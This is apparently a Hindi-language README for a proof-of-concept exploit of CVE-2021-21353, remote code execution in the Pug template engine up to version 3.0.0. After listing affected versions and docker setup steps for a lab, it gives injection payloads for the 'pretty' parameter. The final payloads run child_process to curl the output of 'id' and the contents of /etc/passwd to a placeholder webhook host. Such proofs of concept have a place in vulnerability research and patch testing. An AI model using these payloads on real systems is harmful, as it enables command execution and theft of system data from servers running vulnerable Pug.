
CVE-2021-21353 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Pug टेम्पलेट इंजन संस्करण <=3.0.0 में एक रिमोट कोड निष्पादन भेद्यता। मनमाना कमांड निष्पादित करने के लिए 'pretty' पैरामीटर के माध्यम से पेलोड इंजेक्शन प्रदर्शित करता है।
CVE नंबर : cve-2021-21353
CVSS स्कोर : 8.1
< कमजोर संस्करण >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2
git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up
※ पोर्ट 3000 पर एक्सेस किया जा सकता है
पेलोड परीक्षण
?pretty=');console.log('executed');//
अंतिम पेलोड
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('